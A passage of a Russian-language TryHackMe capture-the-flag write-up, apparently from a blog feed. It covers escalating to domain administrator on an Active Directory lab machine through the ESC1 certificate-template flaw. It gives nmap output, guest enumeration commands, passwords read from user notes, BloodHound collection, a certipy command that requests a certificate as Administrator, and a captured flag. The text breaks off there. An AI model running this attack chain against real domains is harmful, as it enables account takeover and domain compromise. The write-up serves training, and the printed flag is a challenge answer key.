align=\"left\">Severity<\/p>\n<\/th>\n<th>\n<p align=\"left\">Description<\/p>\n<\/th>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">\u041f\u0430\u0440\u043e\u043b\u0438 \u0432 \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u043d\u0438\u044f\u0445<\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>6.5<\/strong> (est.)<\/p>\n<\/td>\n<td>\n<p align=\"left\">Medium<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u041f\u0430\u0440\u043e\u043b\u0438 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0441\u044c \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435 \u0432 \u0440\u0430\u0437\u0434\u0435\u043b\u0435 \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u043d\u0438\u0439, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u0432\u0441\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0441 \u0433\u043e\u0441\u0442\u0435\u0432\u044b\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u043e\u043c CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:N\/A:N<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\"><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2024-49019\" rel=\"noopener noreferrer nofollow\">CVE-2024-49019<\/a> \/ ESC1<\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>7.8<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\">High<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u041d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0439 \u0448\u0430\u0431\u043b\u043e\u043d \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u044e\u0431\u043e\u043c\u0443 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0442\u044c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u044b \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u0430 \u0434\u043b\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u043e\u0432, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430.<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<blockquote>\n<p>\u0420\u0430\u0439\u0442\u0430\u043f \u043e\u0442 <a href=\"https:\/\/github.com\/alfabuster\" rel=\"noopener noreferrer nofollow\">@alfabuster<\/a><\/p>\n<\/blockquote>\n<\/div>\n<p>\u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/articles\/1032298\/\">https:\/\/habr.com\/ru\/articles\/1032298\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ledger Ledger \u2014 \u044d\u0442\u043e \u0441\u043b\u043e\u0436\u043d\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430 Windows \u043d\u0430 TryHackMe, \u0432 \u0446\u0435\u043d\u0442\u0440\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u0430\u044f \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f \u0441\u043b\u0443\u0436\u0431 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0432 Active Directory (AD CS). \u041f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u0430\u044f \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430 \u0432\u044b\u044f\u0432\u043b\u044f\u0435\u0442 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430 (labyrinth.thm.local) \u0441 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0435\u0439 SMB null \u0438 LDAP, \u0440\u0430\u0441\u043a\u0440\u044b\u0432\u0430\u044e\u0449\u0438\u043c \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u043d\u0438\u044f\u0445. \u0427\u0435\u0440\u0435\u0437 certipy-ad \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0448\u0430\u0431\u043b\u043e\u043d \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430 ServerAuth , \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0443\u044f\u0437\u0432\u0438\u043c \u043a ESC1, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u044e\u0431\u043e\u043c\u0443 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u0442\u044c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442, \u0432\u044b\u0434\u0430\u0432\u0430\u044f \u0441\u0435\u0431\u044f \u0437\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430. \u0425\u044d\u0448 NT \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u0435\u0442\u0441\u044f \u0438\u0437 \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430, \u0430 psexec \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u0443\u044e \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0443 NT AUTHORITY SYSTEM. \u0410\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u043d\u044b\u0439 \u043f\u0443\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e LDAP Schannel \u0434\u043b\u044f \u0441\u043b\u0443\u0447\u0430\u0435\u0432, \u043a\u043e\u0433\u0434\u0430 Kerberos PKINIT \u043d\u0435 \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442. \u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430 (T1595.002)\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0432 \u0437\u0430\u0434\u0430\u043d\u0438\u0438 \u0443 \u043d\u0430\u0441 \u0441\u043a\u0430\u0437\u0430\u043d\u043e, \u0447\u0442\u043e \u043d\u0443\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0438\u0442\u044c Active Directory, \u0437\u043d\u0430\u0447\u0438\u0442 \u0443 \u043d\u0430\u0441 Windows, \u0430 \u0434\u043b\u044f \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0433\u043e \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u044d\u0442\u043e\u0439 \u041e\u0421, \u043d\u0443\u0436\u043d\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0444\u043b\u0430\u0433 -Pn.sudo nmap -sC -sV -v 10.114.161.221 -Pn\u0417\u0434\u0435\u0441\u044c \u043c\u043d\u043e\u0433\u043e \u043f\u043e\u0440\u0442\u043e\u0432, \u0435\u0441\u043b\u0438 \u0441\u0440\u0430\u0432\u043d\u0438\u0432\u0430\u0442\u044c \u0441 \u043c\u0430\u0448\u0438\u043d\u0430\u043c\u0438 \u043d\u0430 Linux.PORT     STATE SERVICE       VERSION53\/tcp   open  domain        Simple DNS Plus80\/tcp   open  http          Microsoft IIS httpd 10.088\/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-05-03 09:42:50Z)135\/tcp  open  msrpc         Microsoft Windows RPC139\/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn389\/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)|_ssl-date: 2026-05-03T09:44:40+00:00; 0s from scanner time.| ssl-cert: Subject: commonName=labyrinth.thm.local| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:labyrinth.thm.local| Issuer: commonName=thm-LABYRINTH-CA443\/tcp  open  ssl\/https?445\/tcp  open  microsoft-ds?464\/tcp  open  kpasswd5?593\/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0636\/tcp  open  ssl\/ldap      Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)|_ssl-date: 2026-05-03T09:44:39+00:00; -1s from scanner time.| ssl-cert: Subject: commonName=labyrinth.thm.local| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:labyrinth.thm.local3268\/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=labyrinth.thm.local| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:&lt;unsupported&gt;, DNS:labyrinth.thm.local3269\/tcp open  ssl\/ldap      Microsoft Windows Active Directory LDAP (Domain: thm.local, Site: Default-First-Site-Name)3389\/tcp open  ms-wbt-server Microsoft Terminal Services\u041f\u0435\u0440\u0432\u043e\u0435, \u043d\u0430 \u0447\u0442\u043e \u0441\u0442\u043e\u0438\u0442 \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435 \u044d\u0442\u043e \u0434\u043e\u043c\u0435\u043d\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0443\u0436\u043d\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432 \/etc\/hosts.\u0415\u0441\u0442\u044c \u0434\u0430\u0436\u0435 \u0432\u0435\u0431\u0447\u0438\u043a \u043d\u0430 80 \u0438 443 \u043f\u043e\u0440\u0442\u0443, \u043d\u043e \u0442\u0430\u043c \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u0430\u044f \u0437\u0430\u0433\u043b\u0443\u0448\u043a\u0430 \u043e\u0442 IIS, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0442\u0430\u043c \u0434\u0435\u043b\u0430\u0442\u044c \u043d\u0435\u0447\u0435\u0433\u043e. \u0424\u0430\u0437\u0437\u0438\u0442\u044c, \u0442\u0430\u043c \u0447\u0442\u043e-\u043b\u0438\u0431\u043e \u0431\u0435\u0441\u043f\u043e\u043b\u0435\u0437\u043d\u043e.4 \u043f\u043e\u0440\u0442\u0430 389,636,3268,3269 ldap. \u041e\u043d\u0438 \u0440\u0430\u0437\u0434\u0435\u043b\u044f\u044e\u0442\u0441\u044f \u043f\u043e \u0441\u043f\u043e\u0441\u043e\u0431\u0443 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u043e\u0431\u044a\u0435\u043c\u0443 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445.\u041e\u0447\u0435\u043d\u044c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u043f\u043e\u0440\u0442 3389 \u044d\u0442\u043e rdp, \u043e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u043a\u0430 \u0443 \u043d\u0430\u0441 \u043d\u0435\u0442 \u043a\u0440\u0435\u0434\u043e\u0432, \u0447\u0442\u043e\u0431\u044b \u0442\u0443\u0434\u0430 \u0437\u0430\u0439\u0442\u0438.445 \u043f\u043e\u0440\u0442 \u043f\u043e\u043c\u0435\u0447\u0435\u043d \u043a\u0430\u043a microsoft-ds?, \u043d\u043e \u044d\u0442\u043e \u0434\u043e\u043b\u0436\u0435\u043d \u0431\u044b\u0442\u044c smb.\u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430 \u0447\u0435\u0440\u0435\u0437 smb\u041f\u043e\u043f\u0440\u043e\u0431\u0443\u0435\u043c \u0443\u0437\u043d\u0430\u0442\u044c \u0434\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u043e\u0431\u0449\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0445\u043e\u0441\u0442\u0435. \u0411\u0443\u0434\u0443 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 netexec.~  nxc smb 10.114.161.221                                      SMB         10.114.161.221  445    LABYRINTH        [*] Windows 10 \/ Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:None) (Null Auth:True)\u0417\u0434\u0435\u0441\u044c \u0432\u0430\u0436\u043d\u044b\u0439 \u0432\u044b\u0432\u043e\u0434 \u044d\u0442\u043e Null Auth:true. \u042d\u0442\u043e \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0430 \u00ab\u043d\u0443\u043b\u0435\u0432\u0430\u044f \u0441\u0435\u0441\u0441\u0438\u044f\u00bb (\u0432\u0445\u043e\u0434 \u0431\u0435\u0437 \u043b\u043e\u0433\u0438\u043d\u0430 \u0438 \u043f\u0430\u0440\u043e\u043b\u044f).\u0421 \u043f\u0443\u0441\u0442\u044b\u043c\u0438 \u043a\u0440\u0435\u0434\u0430\u043c\u0438 \u043d\u0430\u0441 \u043d\u0435 \u043f\u0443\u0441\u043a\u0430\u0435\u0442, \u0437\u0430\u0442\u043e \u0433\u043e\u0441\u0442\u044f \u043f\u0440\u0438\u043d\u044f\u043b\u0438 \u043a\u0430\u043a \u0440\u043e\u0434\u043d\u043e\u0433\u043e, \u0437\u0430\u043e\u0434\u043d\u043e \u043c\u043e\u0436\u043d\u043e \u0438\u0437\u0443\u0447\u0438\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a \u0432\u0441\u0435\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438 \u0433\u0440\u0443\u043f\u043f.nxc smb 10.114.161.221  -u &#8216;guest&#8217; -p &#187; &#8212;rid-brute\u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430 \u0447\u0435\u0440\u0435\u0437 ldap\u0421\u0442\u043e\u0438\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u044d\u0442\u043e\u0439 \u0436\u0435 \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439 \u0441\u043f\u0438\u0441\u043e\u043a \u044e\u0437\u0435\u0440\u043e\u0432 \u0447\u0435\u0440\u0435\u0437 \u043f\u043e\u0440\u0442 389. \u0417\u0434\u0435\u0441\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u0435\u0440\u0435\u0434\u0430\u044e\u0442\u0441\u044f \u0432 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u043c \u0432\u0438\u0434\u0435.nxc ldap 10.114.161.221 -u &#8216;guest&#8217; -p &#187; &#8212;users\u0417\u0434\u0435\u0441\u044c \u0442\u0430\u043a\u0436\u0435 \u0432\u0438\u0434\u0438\u043c \u043c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043d\u043e \u0435\u0441\u043b\u0438 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c, \u0442\u043e \u0443 \u0434\u0432\u043e\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439, \u043c\u043e\u0436\u043d\u043e \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c \u0432 \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u043d\u0438\u044f\u0445. IVY_WILLIS \u0438 SUSANNA_MCKNIGHT.\u041f\u0430\u0440\u043e\u043b\u0438 \u0432 \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u043d\u0438\u044f\u0445\u041a\u0440\u0435\u0434\u044b \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u044b, \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u043e\u0431\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u044c\u0441\u044f \u043f\u043e RDP.\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f (T1190) \u0438 \u043f\u0435\u0440\u0432\u044b\u0439 \u0444\u043b\u0430\u0433\u0414\u043b\u044f \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043f\u043e RDP \u044f \u0431\u0443\u0434\u0443 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 Remmina.\u041b\u043e\u0433\u0438\u043d\u0438\u043c\u0441\u044f \u043f\u043e RDP\u0412\u0445\u043e\u0434\u0438\u043c \u043f\u043e \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u043e\u043c\u0443 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u043f\u0430\u0440\u043e\u043b\u044e, \u0434\u043e\u043c\u0435\u043d &#8212; \u0438\u0437 \u0441\u043a\u0430\u043d\u0430 nmap.IVY_WILLIS \u043d\u0435 \u043f\u043e\u0434\u0434\u0430\u043b\u0441\u044f \u0438 \u0432\u0438\u0434\u0438\u043c\u043e \u0441\u043c\u0435\u043d\u0438\u043b \u043f\u0430\u0440\u043e\u043b\u044c. \u0417\u0430\u0442\u043e \u043c\u044b \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0437\u0430\u043b\u043e\u0433\u0438\u043d\u0438\u043b\u0438\u0441\u044c \u043f\u043e\u0434 \u0438\u043c\u0435\u043d\u0435\u043c SUSANNA_MCKNIGHT \u0438 \u0444\u043b\u0430\u0433 \u043d\u0430 \u0440\u0430\u0431\u043e\u0447\u0435\u043c \u0441\u0442\u043e\u043b\u0435.\u041f\u0435\u0440\u0432\u044b\u0439 \u0444\u043b\u0430\u0433THM{Firslt_user_flag!}\u041f\u043e\u0438\u0441\u043a \u0432\u0435\u043a\u0442\u043e\u0440\u0430 \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0435\u043b\u0435\u0433\u0438\u0439 \u0432 AD\u041d\u0443\u0436\u043d\u043e \u0431\u044b \u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c\u0441\u044f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0431\u0443\u0434\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c Bloodhound \u0434\u043b\u044f \u0432\u0438\u0437\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043d\u0430\u0448\u0435\u0433\u043e \u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u044f.bloodhound-ce-python -d thm.local -ns 10.114.161.221 -dc labyrinth.thm.local &#8212;zip -c all -u &#8216;SUSANNA_MCKNIGHT&#8217; -p &#8216;******&#8217;\u042d\u0442\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0441\u043e\u0437\u0434\u0430\u0441\u0442 zip \u0430\u0440\u0445\u0438\u0432. \u0417\u0430\u0442\u0435\u043c \u043f\u0440\u043e\u0441\u0442\u043e \u044d\u043a\u0441\u043f\u043e\u0440\u0442\u0438\u0440\u0443\u0435\u043c \u0435\u0433\u043e \u0432 bloodhound \u0434\u043b\u044f \u043d\u0430\u0433\u043b\u044f\u0434\u043d\u043e\u0441\u0442\u0438.Bloodhound \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430\u0417\u0434\u0435\u0441\u044c \u043c\u043e\u0436\u0435\u043c \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0442\u044c \u043f\u0443\u0442\u044c \u043e\u0442 \u043d\u0430\u0448\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0434\u043e \u0433\u0440\u0443\u043f\u043f\u044b Domain Admins. \u0426\u0435\u043b\u044c \u2014 Beverly \u0438\u043b\u0438 Bradley: \u042d\u0442\u0438 \u0434\u0432\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u2014 \u043a\u0440\u0430\u0442\u0447\u0430\u0439\u0448\u0438\u0439 \u043f\u0443\u0442\u044c \u043a \u043f\u043e\u043b\u043d\u043e\u043c\u0443 \u0437\u0430\u0445\u0432\u0430\u0442\u0443 \u0434\u043e\u043c\u0435\u043d\u0430. \u041e\u0434\u043d\u0430\u043a\u043e \u044d\u0442\u043e\u0442 \u043f\u0443\u0442\u044c \u043d\u0435 \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439 \u043a \u043f\u043e\u043b\u043d\u043e\u043c\u0443 \u0437\u0430\u0445\u0432\u0430\u0442\u0443.\u041f\u0440\u0438 \u0440\u0430\u0431\u043e\u0442\u0435 \u0441 Active Direcory, \u043f\u043e\u043b\u0435\u0437\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0438 \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\u0445 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0432. \u0414\u043b\u044f \u044d\u0442\u0438\u0445 \u0446\u0435\u043b\u0435\u0439 \u043f\u0440\u043e\u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439 certipy-ad.certipy-ad find -u SUSANNA_MCKNIGHT -p &#8216;******&#8217; -dc-ip 10.114.161.221 -vulnerable\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c ESC1\u0423\u0441\u043f\u0435\u0445, \u0435\u0441\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0442\u044c ESC1.\u0428\u0430\u0431\u043b\u043e\u043d ServerAuth \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u044e\u0431\u043e\u043c\u0443 \u0447\u043b\u0435\u043d\u0443 Authenticated Users \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u043a\u043b\u0438\u0435\u043d\u0442\u0441\u043a\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043d\u0430 \u0438\u043c\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u0430, \u0432\u043a\u043b\u044e\u0447\u0430\u044f Domain Administrator.\u0420\u0435\u0448\u0435\u043d\u0438\u0435 \u21161. \u0410\u0442\u0430\u043a\u0443\u0435\u043c AD \u0441 \u043a\u0440\u0435\u0434\u0430\u043c\u0438 \u0430\u0434\u043c\u0438\u043d\u0430\u0417\u043d\u0430\u044f \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 ESC1, \u0434\u0430\u043b\u0435\u0435 \u044f \u043d\u0430\u0441\u0447\u0438\u0442\u0430\u043b \u043a\u0430\u043a \u043c\u0438\u043d\u0438\u043c\u0443\u043c 3 \u043f\u0443\u0442\u0438 \u0440\u0435\u0448\u0435\u043d\u0438\u044f, \u0445\u043e\u0442\u044f \u043e\u043d\u0438 \u0432\u0441\u0435 \u0441\u0445\u043e\u0436\u0438.\u041c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u043f\u0440\u0438\u0442\u0432\u043e\u0440\u0438\u0432\u0448\u0438\u0441\u044c \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u043c.\u041c\u043e\u0436\u043d\u043e \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u0442\u044c \u043f\u0440\u043e\u043f\u0443\u0441\u043a \u043d\u0430 \u0438\u043c\u044f BRADLEY_ORTIZ, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043e\u043d \u0432\u0445\u043e\u0434\u0438\u0442 \u0432 \u0433\u0440\u0443\u043f\u043f\u0443 Domain Admins, \u0430 \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u0444\u043b\u0430\u0433\u0430, \u043d\u0430\u043c \u043d\u0443\u0436\u043d\u043e \u044d\u0442\u043e \u0443\u0441\u043b\u043e\u0432\u0438\u0435.\u0421\u043e\u0437\u0434\u0430\u0442\u044c \u0441\u0432\u043e\u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0432 \u0433\u0440\u0443\u043f\u043f\u0443 Domain Admins.\u0412\u0441\u0435 3 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u044b \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 ESC1.\u0411\u0443\u0434\u0435\u043c \u043f\u0440\u0438\u0442\u0432\u043e\u0440\u044f\u0442\u044c\u0441\u044f \u0430\u0434\u043c\u0438\u043d\u043e\u043c \u0438 \u0441\u0434\u0435\u043b\u0430\u0435\u043c \u0437\u0430\u043f\u0440\u043e\u0441 \u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u0430 \u043e\u0442 \u0435\u0433\u043e \u0438\u043c\u0435\u043d\u0438. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0441\u043d\u043e\u0432\u0430 \u0431\u0443\u0434\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c certipy-ad.certipy-ad req -u &#8216;SUSANNA_MCKNIGHT@thm.local&#8217; -p &#8216;******!&#8217; -target labyrinth.thm.local  -template &#8216;ServerAuth&#8217; -ca &#8216;thm-LABYRINTH-CA&#8217; -upn Administrator@thm.local\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0444\u0430\u0439\u043b administrator.pfx, 